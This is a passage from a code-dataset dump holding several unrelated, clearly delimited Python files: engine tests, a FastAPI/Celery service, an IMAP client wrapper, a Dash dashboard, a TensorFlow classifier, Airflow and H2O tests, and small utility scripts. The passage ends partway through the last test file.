assert evaluator.state.epoch == 1
assert evaluator.state.iteration == size
def test_set_data():
# tests FR https://github.com/pytorch/ignite/issues/833
from torch.utils.data import DataLoader
num_iters1 = 10
num_iters2 = 20
batch_size = 4
torch.manual_seed(1)
data1 = DataLoader(torch.rand(num_iters1 * batch_size, 11), batch_size=batch_size)
data2 = DataLoader(torch.rand(num_iters2 * batch_size, 22), batch_size=batch_size)
switch_iteration = 35
def train_fn(e, batch):
if e.state.iteration <= switch_iteration:
assert batch.shape[1] == 11, f"{e.state.iteration}: {batch.shape}"
else:
assert batch.shape[1] == 22, f"{e.state.iteration}: {batch.shape}"
trainer = Engine(train_fn)
@trainer.on(Events.ITERATION_COMPLETED(once=switch_iteration))
def switch_dataloader():
trainer.set_data(data2)
trainer.run(data1, max_epochs=10)
def test_run_with_max_iters():
max_iters = 8
engine = Engine(lambda e, b: 1)
engine.run([0] * 20, max_iters=max_iters)
assert engine.state.iteration == max_iters
assert engine.state.max_iters == max_iters
def test_run_with_max_iters_greater_than_epoch_length():
max_iters = 73
engine = Engine(lambda e, b: 1)
engine.run([0] * 20, max_iters=max_iters)
assert engine.state.iteration == max_iters
def test_run_with_invalid_max_iters_and_max_epoch():
max_iters = 12
max_epochs = 2
engine = Engine(lambda e, b: 1)
with pytest.raises(
ValueError,
match=r"Arguments max_iters and max_epochs are mutually exclusive."
"Please provide only max_epochs or max_iters.",
):
engine.run([0] * 20, max_iters=max_iters, max_epochs=max_epochs)
def test_epoch_events_fired():
max_iters = 32
engine = Engine(lambda e, b: 1)
@engine.on(Events.EPOCH_COMPLETED)
def fired_event(engine):
assert engine.state.iteration % engine.state.epoch_length == 0
engine.run([0] * 10, max_iters=max_iters)
def test_is_done_with_max_iters():
state = State(iteration=100, epoch=1, max_epochs=3, epoch_length=100, max_iters=250)
assert not Engine._is_done(state)
state = State(iteration=250, epoch=1, max_epochs=3, epoch_length=100, max_iters=250)
assert Engine._is_done(state)
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test_batch_is_released_before_new_one_is_loaded_on_cuda():
torch.cuda.empty_cache()
engine = Engine(lambda e, b: None)
def _test():
mem_consumption = []
def dataloader():
for _ in range(4):
mem_consumption.append(torch.cuda.memory_allocated())
batch = torch.randn(10).cuda()
mem_consumption.append(torch.cuda.memory_allocated())
yield batch
engine.run(dataloader(), max_epochs=2, epoch_length=2)
return mem_consumption
mem_consumption1 = _test()
# mem_consumption should look like [0, 512, 512, 512, 512, 512, 512, 512]
assert len(set(mem_consumption1[1:])) == 1
mem_consumption2 = _test()
assert len(set(mem_consumption2[1:])) == 1
assert mem_consumption1 == mem_consumption2
@pytest.mark.skipif(torch.cuda.device_count() < 1, reason="Skip if no GPU")
def test_output_is_released_before_new_one_is_assigned_on_cuda():
torch.cuda.empty_cache()
def _test():
mem_consumption = []
def update_fn(engine, batch):
mem_consumption.append(torch.cuda.memory_allocated())
output = torch.rand(10).cuda()
mem_consumption.append(torch.cuda.memory_allocated())
return output
engine = Engine(update_fn)
engine.run([0, 1], max_epochs=2)
return mem_consumption
mem_consumption1 = _test()
# mem_consumption ~ [0, 512, 0, 512, 0, 512, 0, 512]
assert len(set(mem_consumption1)) == 2
mem_consumption2 = _test()
assert len(set(mem_consumption2)) == 2
assert mem_consumption1 == mem_consumption2
def test_engine_no_data_asserts():
trainer = Engine(lambda e, b: None)
with pytest.raises(ValueError, match=r"epoch_length should be provided if data is None"):
trainer.run(max_epochs=10)
def test_engine_no_data():
def train_step(engine, batch):
assert batch is None
trainer = Engine(train_step)
trainer.run(max_epochs=10, epoch_length=10)
assert trainer.state.iteration == 10 * 10
assert trainer.state.epoch == 10
assert trainer.state.dataloader is None
# continue
trainer.run(max_epochs=20)
assert trainer.state.iteration == 20 * 10
assert trainer.state.epoch == 20
assert trainer.state.dataloader is None
|
the-stack_0_19890 | from typing import Optional, Any
from fastapi import FastAPI
from pydantic import BaseModel
from tasks import celery, calc_bmi
app = FastAPI()
class Body(BaseModel):
weight: float
height: float
class TaskStatus(BaseModel):
id: str
status: Optional[str]
result: Optional[Any]
@app.post('/bmi', response_model=TaskStatus, response_model_exclude_unset=True)
def calculate_bmi(body: Body):
task = calc_bmi.delay(weight=body.weight, height=body.height)
return TaskStatus(id=task.id)
@app.get('/bmi/{task_id}', response_model=TaskStatus)
def check_status(task_id: str):
result = celery.AsyncResult(task_id)
status = TaskStatus(id=task_id, status=result.status, result=result.result)
return status
|
the-stack_0_19891 | import os
import re
import queue
import asyncio
import threading
from mailtk.data import Mailbox, ThreadInfo, Flag, namedtuple
from imapclient import IMAPClient
import email
import imapclient
from mailtk.util import decode_any_header
from mailtk.accounts.base import AccountBase
class ThreadMessage(namedtuple.abc):
_fields = (
'flag', 'size', 'date', 'from_', 'to', 'cc', 'subject',
'message_id', 'references', 'in_reply_to', 'key', 'children')
class MailboxImap(Mailbox):
_fields = 'flags path'
class ThreadInfoImap(ThreadInfo):
_fields = 'mailbox message_key'
def imap_unescape(v):
if v.startswith('"'):
mo = re.match(r'^"(?:[^"\\]|\\")*"$', v)
assert mo
return v[1:-1].replace('\\"', '"')
return v
class ImapAccount(AccountBase):
@classmethod
async def initialize(cls, loop, host, port, username, password, ssl=False):
# TODO: STARTTLS support?
imap = cls(loop, host, int(port), bool(ssl))
await imap.connect()
await imap.backend.login(username, password)
return imap
def __init__(self, loop, host, port, ssl):
self.backend = ImapBackend(loop, host, port, ssl)
async def connect(self):
await self.backend.connect()
async def disconnect(self):
await self.backend.disconnect()
async def capabilities(self):
return await self.backend.capabilities()
def _check_code(self, result):
code, data = result
if code != 'OK':
assert len(data) == 1
raise Exception(data[0].decode())
return data
async def list_folders(self):
mailboxes = {}
children = {}
for flags, delimiter, path in await self.backend.list_folders():
delimiter = (delimiter or b'').decode()
parent, sep, name = path.rpartition(delimiter)
c = children.setdefault(path, [])
m = mailboxes[path] = MailboxImap(
Mailbox(name, c), flags, path)
children.setdefault(parent, []).append(m)
if not any(m.lower() == 'inbox' for m in mailboxes.keys()):
print("Inserting INBOX")
m = mailboxes['INBOX'] = Mailbox('INBOX', [])
children.setdefault('', []).insert(0, m)
return children['']
async def list_messages(self, mailbox):
assert isinstance(mailbox, MailboxImap)
n_messages = await self.backend.select_folder(mailbox.path)
if n_messages == 0:
return []
message_ids = await self.backend.search()
params = [
'FLAGS', 'RFC822.SIZE',
'BODY.PEEK[HEADER.FIELDS (Date From To Cc Subject ' +
'Message-ID References In-Reply-To)]']
data = await self.backend.fetch(message_ids, params)
def parse_flags(imap_flags):
if b'\\Answered' in imap_flags:
return Flag.replied
elif b'\\Seen' in imap_flags:
return Flag.read
elif b'\\Recent' in imap_flags:
return Flag.new
else:
return Flag.unread
def parse(message_key, message_value):
message_value.pop(b'SEQ', None)
flag = parse_flags(message_value.pop(b'FLAGS'))
size = message_value.pop(b'RFC822.SIZE')
(k, message_bytes), = message_value.items()
assert k.startswith(b'BODY')
mime = email.message_from_bytes(message_bytes)
assert isinstance(mime, email.message.Message)
def header(k, d=None):
v = mime[k]
if isinstance(v, email.header.Header):
return str(v)
assert isinstance(v, (str, type(None))), type(v)
return d if v is None else str(decode_any_header(v))
message_id = header('Message-ID')
date_header = header('Date')
return message_id, ThreadMessage(
flag=flag,
size=size,
date=email.utils.parsedate_to_datetime(
date_header) if date_header is not None else None,
from_=header('From'),
to=header('To'),
cc=header('Cc'),
subject=header('Subject'),
message_id=message_id,
references=header('References', '').split(),
in_reply_to=header('In-Reply-To', '').split(),
key=message_key,
children=[],
)
messages = dict(parse(k, v) for k, v in data.items())
toplevel = []
for m in messages.values():
for p in m.in_reply_to + m.references:
try:
messages[p].children.append(m)
break
except KeyError:
pass
else:
toplevel.append(m)
def thread_date(m):
return max([(m.date is not None, m.date and m.date.tzinfo is None, m.date)] +
[thread_date(c) for c in m.children])
toplevel.sort(key=thread_date, reverse=True)
def convert(o: ThreadMessage):
v = ThreadInfo(
flag=o.flag,
size=o.size,
date=o.date,
sender=o.from_,
recipients=', '.join(filter(None, (o.to, o.cc))),
subject=o.subject,
children=[convert(c) for c in o.children],
excerpt='',
)
return ThreadInfoImap(v, mailbox, o.key)
return [convert(t) for t in toplevel]
async def fetch_message(self, threadinfo):
assert isinstance(threadinfo, ThreadInfoImap), type(threadinfo)
# mailbox = threadinfo.mailbox
message_key = threadinfo.message_key
# await self.backend.select_folder(mailbox.path)
params = ['RFC822']
data, = (await self.backend.fetch([message_key], params)).values()
return data[b'RFC822']
class ImapBackend:
BREAK = object()
NOOP = object()
def __init__(self, loop, host, port, ssl):
self._loop = loop
self._host = host
self._port = port
self._ssl = ssl
self._command_queue = queue.Queue()
self._response_queue = queue.Queue()
self._ready_r, self._ready_w = os.pipe()
loop.add_reader(self._ready_r, self._ready)
self._ready = threading.Event()
self._thread = threading.Thread(None, self._run)
self._breaking = False
async def connect(self):
self._thread.start()
async def disconnect(self):
await self.logout()
await self._call(self.BREAK)
self._thread.join()
async def _call(self, method, *args):
if self._breaking:
raise Exception('connection is closing')
future = asyncio.Future(loop=self._loop)
self._command_queue.put_nowait((future, method, args))
if method is self.BREAK:
self._breaking = True
result = await future
if isinstance(result, Exception):
raise result
return result
def _run(self):
# Run commands in thread
if self._ssl:
kwargs = dict(
ssl_context=imapclient.create_default_context())
else:
kwargs = {}
try:
conn = IMAPClient(self._host, self._port, ssl=self._ssl, **kwargs)
except Exception as exn:
future, method, args = self._command_queue.get()
self._response_queue.put((future, exn))
self._command_queue.task_done()
os.write(self._ready_w, b'x')
return
try:
while True:
future, method, args = self._command_queue.get()
if method is self.BREAK:
break
elif method is self.NOOP:
result = None
else:
# TODO check if future is cancelled
try:
result = getattr(conn, method)(*args)
except Exception as exn:
result = exn
# TODO use call_soon_threadsafe instead of _response_queue?
self._response_queue.put((future, result))
self._command_queue.task_done()
os.write(self._ready_w, b'x')
finally:
conn.shutdown()
assert method is self.BREAK
self._response_queue.put((future, None))
self._command_queue.task_done()
os.write(self._ready_w, b'x')
def _ready(self):
os.read(self._ready_r, 1)
future, result = self._response_queue.get_nowait()
if not future.cancelled():
future.set_result(result)
self._response_queue.task_done()
# The following methods were generated by gen-imap.py
async def add_flags(self, messages, flags, silent=False):
'Add *flags* to *messages* in the currently selected folder.'
return await self._call('add_flags', messages, flags, silent)
async def add_gmail_labels(self, messages, labels, silent=False):
'Add *labels* to *messages* in the currently selected folder.'
return await self._call('add_gmail_labels', messages, labels, silent)
async def append(self, folder, msg, flags=(), msg_time=None):
'Append a message to *folder*.'
return await self._call('append', folder, msg, flags, msg_time)
async def capabilities(self):
'Returns the server capability list.'
return await self._call('capabilities')
async def close_folder(self):
'Close the currently selected folder, returning the server'
return await self._call('close_folder')
async def copy(self, messages, folder):
'Copy one or more messages from the current folder to'
return await self._call('copy', messages, folder)
async def create_folder(self, folder):
'Create *folder* on the server returning the server response string.'
return await self._call('create_folder', folder)
async def delete_folder(self, folder):
'Delete *folder* on the server returning the server response string.'
return await self._call('delete_folder', folder)
async def delete_messages(self, messages, silent=False):
'Delete one or more *messages* from the currently selected'
return await self._call('delete_messages', messages, silent)
async def expunge(self):
'Remove any messages from the currently selected folder that'
return await self._call('expunge')
async def fetch(self, messages, data, modifiers=None):
'Retrieve selected *data* associated with one or more'
return await self._call('fetch', messages, data, modifiers)
async def folder_exists(self, folder):
'Return ``True`` if *folder* exists on the server.'
return await self._call('folder_exists', folder)
async def folder_status(self, folder, what=None):
'Return the status of *folder*.'
return await self._call('folder_status', folder, what)
async def get_flags(self, messages):
'Return the flags set for each message in *messages* from'
return await self._call('get_flags', messages)
async def get_gmail_labels(self, messages):
'Return the label set for each message in *messages* in the'
return await self._call('get_gmail_labels', messages)
async def getacl(self, folder):
'Returns a list of ``(who, acl)`` tuples describing the'
return await self._call('getacl', folder)
async def gmail_search(self, query, charset='UTF-8'):
"Search using Gmail's X-GM-RAW attribute."
return await self._call('gmail_search', query, charset)
async def has_capability(self, capability):
'Return ``True`` if the IMAP server has the given *capability*.'
return await self._call('has_capability', capability)
async def id_(self, parameters=None):
'Issue the ID command, returning a dict of server implementation'
return await self._call('id_', parameters)
async def idle(self):
'Put the server into IDLE mode.'
return await self._call('idle')
async def idle_check(self, timeout=None):
'Check for any IDLE responses sent by the server.'
return await self._call('idle_check', timeout)
async def idle_done(self):
'Take the server out of IDLE mode.'
return await self._call('idle_done')
async def list_folders(self, directory='', pattern='*'):
'Get a listing of folders on the server as a list of'
return await self._call('list_folders', directory, pattern)
async def list_sub_folders(self, directory='', pattern='*'):
'Return a list of subscribed folders on the server as'
return await self._call('list_sub_folders', directory, pattern)
async def login(self, username, password):
'Login using *username* and *password*, returning the'
return await self._call('login', username, password)
async def logout(self):
'Logout, returning the server response.'
return await self._call('logout')
async def namespace(self):
'Return the namespace for the account as a (personal, other,'
return await self._call('namespace')
async def noop(self):
'Execute the NOOP command.'
return await self._call('noop')
async def oauth2_login(self, user, access_token, mech='XOAUTH2', vendor=None):
'Authenticate using the OAUTH2 method.'
return await self._call(
'oauth2_login', user, access_token, mech, vendor)
async def oauth_login(self, url, oauth_token, oauth_token_secret, consumer_key='anonymous', consumer_secret='anonymous'):
'Authenticate using the OAUTH method.'
return await self._call(
'oauth_login', url, oauth_token, oauth_token_secret, consumer_key, consumer_secret)
async def plain_login(self, identity, password, authorization_identity=None):
'Authenticate using the PLAIN method (requires server support).'
return await self._call(
'plain_login', identity, password, authorization_identity)
async def remove_flags(self, messages, flags, silent=False):
'Remove one or more *flags* from *messages* in the currently'
return await self._call('remove_flags', messages, flags, silent)
async def remove_gmail_labels(self, messages, labels, silent=False):
'Remove one or more *labels* from *messages* in the'
return await self._call(
'remove_gmail_labels', messages, labels, silent)
async def rename_folder(self, old_name, new_name):
'Change the name of a folder on the server.'
return await self._call('rename_folder', old_name, new_name)
async def search(self, criteria='ALL', charset=None):
'Return a list of messages ids from the currently selected'
return await self._call('search', criteria, charset)
async def select_folder(self, folder, readonly=False):
'Set the current folder on the server.'
return await self._call('select_folder', folder, readonly)
async def set_flags(self, messages, flags, silent=False):
'Set the *flags* for *messages* in the currently selected'
return await self._call('set_flags', messages, flags, silent)
async def set_gmail_labels(self, messages, labels, silent=False):
'Set the *labels* for *messages* in the currently selected'
return await self._call('set_gmail_labels', messages, labels, silent)
async def setacl(self, folder, who, what):
'Set an ACL (*what*) for user (*who*) for a folder.'
return await self._call('setacl', folder, who, what)
async def shutdown(self):
'Close the connection to the IMAP server (without logging out)'
return await self._call('shutdown')
async def sort(self, sort_criteria, criteria='ALL', charset='UTF-8'):
'Return a list of message ids from the currently selected'
return await self._call('sort', sort_criteria, criteria, charset)
async def starttls(self, ssl_context=None):
'Switch to an SSL encrypted connection by sending a STARTTLS command.'
return await self._call('starttls', ssl_context)
async def subscribe_folder(self, folder):
'Subscribe to *folder*, returning the server response string.'
return await self._call('subscribe_folder', folder)
async def thread(self, algorithm='REFERENCES', criteria='ALL', charset='UTF-8'):
'Return a list of messages threads from the currently'
return await self._call('thread', algorithm, criteria, charset)
async def unsubscribe_folder(self, folder):
'Unsubscribe to *folder*, returning the server response string.'
return await self._call('unsubscribe_folder', folder)
async def xlist_folders(self, directory='', pattern='*'):
'Execute the XLIST command, returning ``(flags, delimiter,'
return await self._call('xlist_folders', directory, pattern)
# End generated methods
|
the-stack_0_19892 | # -*- coding: utf-8 -*-
__all__ = ['ExplainerDashboard', 'ExplainerDashboardStandaloneTab',
'ModelSummaryTab']
import dash
import dash_core_components as dcc
import dash_bootstrap_components as dbc
import dash_html_components as html
from dash.dependencies import Input, Output, State
from dash.exceptions import PreventUpdate
import plotly.io as pio
from .dashboard_tabs.dashboard_methods import *
from .dashboard_tabs.model_summary_tab import *
from .dashboard_tabs.contributions_tab import *
from .dashboard_tabs.shap_dependence_tab import *
from .dashboard_tabs.shap_interactions_tab import *
from .dashboard_tabs.decision_trees_tab import *
class ExplainerDashboard:
"""Constructs a dashboard out of an ExplainerBunch object. You can indicate
which tabs to include, and pass kwargs to individual tabs.
"""
def __init__(self, explainer, title='Model Explainer',
tabs=None,
model_summary=True,
contributions=True,
shap_dependence=True,
shap_interaction=True,
decision_trees=True,
plotly_template="none",
**kwargs):
"""Constructs an ExplainerDashboard.
:param explainer: an ExplainerBunch object
:param title: Title of the dashboard, defaults to 'Model Explainer'
:type title: str, optional
:param model_summary: display model_summary tab or not, defaults to True
:type model_summary: bool, optional
:param contributions: display individual contributions tab or not, defaults to True
:type contributions: bool, optional
:param shap_dependence: display shap dependence tab or not, defaults to True
:type shap_dependence: bool, optional
:param shap_interaction: display tab interaction tab or not.
:type shap_interaction: bool, optional
:param decision_trees: display tab with individual decision tree of random forest, defaults to False
:type decision_trees: bool, optional
"""
self.explainer=explainer
self.title = title
self.model_summary = model_summary
self.contributions = contributions
self.shap_dependence = shap_dependence
self.shap_interaction = shap_interaction
self.decision_trees = decision_trees
self.plotly_template = plotly_template
self.kwargs = kwargs
# calculate lazily loaded properties before starting dashboard:
if shap_dependence or contributions or model_summary:
_ = explainer.shap_values, explainer.preds, explainer.pred_percentiles
if explainer.cats is not None:
_ = explainer.shap_values_cats
if explainer.is_classifier:
_ = explainer.pred_probas
if model_summary:
_ = explainer.permutation_importances
if explainer.cats is not None:
_ = explainer.permutation_importances_cats
if shap_interaction:
try:
_ = explainer.shap_interaction_values
if explainer.cats is not None:
_ = explainer.shap_interaction_values_cats
except:
print("Note: calculating shap interaction failed, so turning off interactions tab")
self.shap_interaction=False
if decision_trees:
if hasattr(self.explainer, 'decision_trees'):
_ = explainer.graphviz_available
_ = explainer.decision_trees
else:
self.decision_trees = False
self.app = dash.Dash(__name__)
self.app.config['suppress_callback_exceptions']=True
self.app.css.config.serve_locally = True
self.app.scripts.config.serve_locally = True
self.app.title = title
pio.templates.default = self.plotly_template
# layout
self.title_and_label_selector = TitleAndLabelSelector(explainer, title=title)
self.tabs = [] if tabs is None else tabs
self._insert_tabs()
assert len(self.tabs) > 0, 'need to pass at least one tab! e.g. model_summary=True'
self.tab_layouts = [
dcc.Tab(children=tab.layout(), label=tab.title, id=tab.tab_id, value=tab.tab_id)
for tab in self.tabs]
self.app.layout = dbc.Container([
self.title_and_label_selector.layout(),
dcc.Tabs(id="tabs", value=self.tabs[0].tab_id, children=self.tab_layouts),
], fluid=True)
#register callbacks
self.title_and_label_selector.register_callbacks(self.app)
for tab in self.tabs:
tab.register_callbacks(self.app)
def _insert_tabs(self):
if self.model_summary:
self.tabs.append(ModelSummaryTab(self.explainer, **self.kwargs))
if self.contributions:
self.tabs.append(ContributionsTab(self.explainer, **self.kwargs))
if self.shap_dependence:
self.tabs.append(ShapDependenceTab(self.explainer, **self.kwargs))
if self.shap_interaction:
self.tabs.append(ShapInteractionsTab(self.explainer, **self.kwargs))
if self.decision_trees:
assert hasattr(self.explainer, 'decision_trees'), \
"""the explainer object has no shadow_trees property. This tab
only works with a RandomForestClassifierBunch or RandomForestRegressionBunch"""
self.tabs.append(DecisionTreesTab(self.explainer, **self.kwargs))
def run(self, port=8050, **kwargs):
"""Starts the dashboard using the built-in Flask server on localhost:port
:param port: the port to run the dashboard on, defaults to 8050
:type port: int, optional
"""
print(f"Running {self.title} on http://localhost:{port}")
pio.templates.default = self.plotly_template
self.app.run_server(port=port, **kwargs)
class ExplainerDashboardStandaloneTab:
"""Constructs a dashboard out of an ExplainerBunch object. You can indicate
which tabs to include, and pass kwargs to individual tabs.
"""
def __init__(self, explainer, tab, title='Model Explainer',
plotly_template="none", **kwargs):
"""Constructs an ExplainerDashboard.
:param explainer: an ExplainerBunch object
:param title: Title of the dashboard, defaults to 'Model Explainer'
:type title: str, optional
:param tab: single tab to be run as dashboard
"""
self.explainer = explainer
self.title = title
self.plotly_template = plotly_template
self.kwargs = kwargs
self.tab = tab(self.explainer, standalone=True, **self.kwargs)
self.app = dash.Dash(__name__)
self.app.config['suppress_callback_exceptions']=True
self.app.css.config.serve_locally = True
self.app.scripts.config.serve_locally = True
self.app.title = title
pio.templates.default = self.plotly_template
self.app.layout = self.tab.layout()
self.tab.register_callbacks(self.app)
def run(self, port=8050, **kwargs):
"""Starts the dashboard using the built-in Flask server on localhost:port
:param port: the port to run the dashboard on, defaults to 8050
:type port: int, optional
"""
print(f"Running {self.title} on http://localhost:{port}")
pio.templates.default = self.plotly_template
self.app.run_server(port=port, **kwargs)
|
the-stack_0_19893 | #!/usr/bin/env python
# coding: utf-8
# In[1]:
import time
import matplotlib.pyplot as plt
import seaborn as sns
import tensorflow as tf
from sklearn.cross_validation import train_test_split
from utils import *
# In[2]:
trainset = sklearn.datasets.load_files(container_path="data", encoding="UTF-8")
trainset.data, trainset.target = separate_dataset(trainset, 1.0)
print(trainset.target_names)
print(len(trainset.data))
print(len(trainset.target))
# In[3]:
train_X, test_X, train_Y, test_Y = train_test_split(trainset.data, trainset.target, test_size=0.2)
# In[4]:
concat = " ".join(trainset.data).split()
vocabulary_size = len(list(set(concat)))
data, count, dictionary, rev_dictionary = build_dataset(concat, vocabulary_size)
print("vocab from size: %d" % (vocabulary_size))
print("Most common words", count[4:10])
print("Sample data", data[:10], [rev_dictionary[i] for i in data[:10]])
# In[5]:
GO = dictionary["GO"]
PAD = dictionary["PAD"]
EOS = dictionary["EOS"]
UNK = dictionary["UNK"]
# In[6]:
size_layer = 128
num_layers = 2
embedded_size = 128
dimension_output = len(trainset.target_names)
learning_rate = 1e-3
maxlen = 50
batch_size = 128
# In[7]:
class Model:
def __init__(
self, size_layer, num_layers, embedded_size, dict_size, dimension_output, learning_rate
):
def cells(reuse=False):
return tf.nn.rnn_cell.LSTMCell(
size_layer, initializer=tf.orthogonal_initializer(), reuse=reuse
)
self.X = tf.placeholder(tf.int32, [None, None])
self.Y = tf.placeholder(tf.int32, [None])
batch_size = tf.shape(self.X)[0]
encoder_embeddings = tf.Variable(tf.random_uniform([dict_size, embedded_size], -1, 1))
encoder_embedded = tf.nn.embedding_lookup(encoder_embeddings, self.X)
outputs, last_state = tf.nn.dynamic_rnn(
tf.nn.rnn_cell.MultiRNNCell([cells() for _ in range(num_layers)]),
encoder_embedded,
dtype=tf.float32,
)
attention_mechanism = tf.contrib.seq2seq.LuongAttention(
num_units=size_layer, memory=outputs
)
rnn_cells = tf.contrib.seq2seq.AttentionWrapper(
cell=tf.nn.rnn_cell.MultiRNNCell([cells() for _ in range(num_layers)]),
attention_mechanism=attention_mechanism,
attention_layer_size=size_layer,
alignment_history=True,
)
decoder_outputs, decoder_last_state = tf.nn.dynamic_rnn(
rnn_cells,
encoder_embedded,
initial_state=rnn_cells.zero_state(batch_size, tf.float32).clone(cell_state=last_state),
dtype=tf.float32,
)
self.alignments = tf.transpose(decoder_last_state.alignment_history.stack(), [1, 2, 0])
W = tf.get_variable(
"w", shape=(size_layer, dimension_output), initializer=tf.orthogonal_initializer()
)
b = tf.get_variable("b", shape=(dimension_output), initializer=tf.zeros_initializer())
self.logits = tf.matmul(outputs[:, -1], W) + b
self.cost = tf.reduce_mean(
tf.nn.sparse_softmax_cross_entropy_with_logits(logits=self.logits, labels=self.Y)
)
self.optimizer = tf.train.AdamOptimizer(learning_rate=learning_rate).minimize(self.cost)
correct_pred = tf.equal(tf.argmax(self.logits, 1, output_type=tf.int32), self.Y)
self.accuracy = tf.reduce_mean(tf.cast(correct_pred, tf.float32))
# In[8]:
tf.reset_default_graph()
sess = tf.InteractiveSession()
model = Model(
size_layer, num_layers, embedded_size, len(dictionary), dimension_output, learning_rate
)
sess.run(tf.global_variables_initializer())
# In[9]:
EARLY_STOPPING, CURRENT_CHECKPOINT, CURRENT_ACC, EPOCH = 5, 0, 0, 0
while True:
lasttime = time.time()
if CURRENT_CHECKPOINT == EARLY_STOPPING:
print("break epoch:%d\n" % (EPOCH))
break
train_acc, train_loss, test_acc, test_loss = 0, 0, 0, 0
for i in range(0, (len(train_X) // batch_size) * batch_size, batch_size):
batch_x = str_idx(train_X[i : i + batch_size], dictionary, maxlen)
acc, loss, _ = sess.run(
[model.accuracy, model.cost, model.optimizer],
feed_dict={model.X: batch_x, model.Y: train_Y[i : i + batch_size]},
)
train_loss += loss
train_acc += acc
for i in range(0, (len(test_X) // batch_size) * batch_size, batch_size):
batch_x = str_idx(test_X[i : i + batch_size], dictionary, maxlen)
acc, loss = sess.run(
[model.accuracy, model.cost],
feed_dict={model.X: batch_x, model.Y: test_Y[i : i + batch_size]},
)
test_loss += loss
test_acc += acc
train_loss /= len(train_X) // batch_size
train_acc /= len(train_X) // batch_size
test_loss /= len(test_X) // batch_size
test_acc /= len(test_X) // batch_size
if test_acc > CURRENT_ACC:
print("epoch: %d, pass acc: %f, current acc: %f" % (EPOCH, CURRENT_ACC, test_acc))
CURRENT_ACC = test_acc
CURRENT_CHECKPOINT = 0
else:
CURRENT_CHECKPOINT += 1
print("time taken:", time.time() - lasttime)
print(
"epoch: %d, training loss: %f, training acc: %f, valid loss: %f, valid acc: %f\n"
% (EPOCH, train_loss, train_acc, test_loss, test_acc)
)
EPOCH += 1
# In[10]:
sns.set()
# In[11]:
heatmap = sess.run(
model.alignments, feed_dict={model.X: str_idx(test_X[1:2], dictionary, len(test_X[1].split()))}
)
# In[12]:
plt.figure(figsize=(15, 10))
sns.heatmap(heatmap[:, 0, :], xticklabels=test_X[1].split(), yticklabels=test_X[1].split())
plt.show()
|
the-stack_0_19894 | """
Rename TOPS-20 filespecs to regular files without version number
"""
from os import listdir, rename
import os.path
import re
SOURCEPATH = "10_7_mon/ctls"
tops20File = re.compile("(.*\.\w\w\w)(\.\d)")
files = listdir(SOURCEPATH)
pairs = []
for f in files:
m = tops20File.match(f)
if m:
p = ( f, m.groups()[0])
pairs.append(p)
for p in pairs:
original = os.path.join(SOURCEPATH, p[0])
nou = os.path.join(SOURCEPATH, p[1])
os.rename(original, nou)
|
the-stack_0_19896 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
import unittest
import mock
from parameterized import parameterized
from airflow import plugins_manager
from airflow.executors.executor_loader import ExecutorLoader
from tests.test_utils.config import conf_vars
# Plugin Manager creates new modules, which is difficult to mock, so we use test isolation by a unique name.
TEST_PLUGIN_NAME = "unique_plugin_name_to_avoid_collision_i_love_kitties"
class FakeExecutor:
pass
class FakePlugin(plugins_manager.AirflowPlugin):
name = TEST_PLUGIN_NAME
executors = [FakeExecutor]
class TestExecutorLoader(unittest.TestCase):
def setUp(self) -> None:
ExecutorLoader._default_executor = None
def tearDown(self) -> None:
ExecutorLoader._default_executor = None
@parameterized.expand([
("LocalExecutor", ),
("DebugExecutor", ),
])
def test_should_support_executor_from_core(self, executor_name):
with conf_vars({
("core", "executor"): executor_name
}):
executor = ExecutorLoader.get_default_executor()
self.assertIsNotNone(executor)
self.assertEqual(executor_name, executor.__class__.__name__)
@mock.patch("airflow.plugins_manager.plugins", [
FakePlugin()
])
@mock.patch("airflow.plugins_manager.executors_modules", None)
def test_should_support_plugins(self):
with conf_vars({
("core", "executor"): f"{TEST_PLUGIN_NAME}.FakeExecutor"
}):
executor = ExecutorLoader.get_default_executor()
self.assertIsNotNone(executor)
self.assertEqual("FakeExecutor", executor.__class__.__name__)
def test_should_support_custom_path(self):
with conf_vars({
("core", "executor"): "tests.executors.test_executor_loader.FakeExecutor"
}):
executor = ExecutorLoader.get_default_executor()
self.assertIsNotNone(executor)
self.assertEqual("FakeExecutor", executor.__class__.__name__)
|
the-stack_0_19897 | """
Simple Lithops example using the 'storage' parameter, which is
a ready-to-use Storage instance.
"""
import lithops
def my_function(bucket_name, obj_key, storage):
print('I am processing the object //{}/{}'.format(bucket_name, obj_key))
counter = {}
data = storage.get_object(bucket_name, obj_key)
for line in data.splitlines():
for word in line.decode('utf-8').split():
if word not in counter:
counter[word] = 1
else:
counter[word] += 1
return counter
if __name__ == '__main__':
bucket_name = 'lithops-sample-data'
obj_key = 'obj1.txt'
fexec = lithops.FunctionExecutor()
fexec.call_async(my_function, [bucket_name, obj_key])
print(fexec.get_result())
|
the-stack_0_19898 | from __future__ import print_function
import sys
import h2o
sys.path.insert(1,"../../../")
from tests import pyunit_utils
from h2o.estimators.aggregator import H2OAggregatorEstimator
#testing default setup of following parameters:
#distribution (available in Deep Learning, XGBoost, GBM):
#stopping_metric (available in: GBM, DRF, Deep Learning, AutoML, XGBoost, Isolation Forest):
#histogram_type (available in: GBM, DRF)
#solver (available in: GLM) already done in hex.glm.GLM.defaultSolver()
#categorical_encoding (available in: GBM, DRF, Deep Learning, K-Means, Aggregator, XGBoost, Isolation Forest)
#fold_assignment (available in: GBM, DRF, Deep Learning, GLM, Naïve-Bayes, K-Means, XGBoost)
def test_aggregator_effective_parameters():
frame = h2o.create_frame(rows=10000, cols=10, categorical_fraction=0.6, integer_fraction=0, binary_fraction=0, real_range=100,
integer_range=100, missing_fraction=0, factors=100, seed=1234)
agg1 = H2OAggregatorEstimator(target_num_exemplars=1000, rel_tol_num_exemplars=0.5, categorical_encoding="eigen")
agg1.train(training_frame=frame)
agg2 = H2OAggregatorEstimator(target_num_exemplars=1000, rel_tol_num_exemplars=0.5)
agg2.train(training_frame=frame)
assert agg2.parms['categorical_encoding']['input_value'] == "AUTO"
assert agg2.parms['categorical_encoding']['actual_value'] == agg1.parms['categorical_encoding']['actual_value']
if __name__ == "__main__":
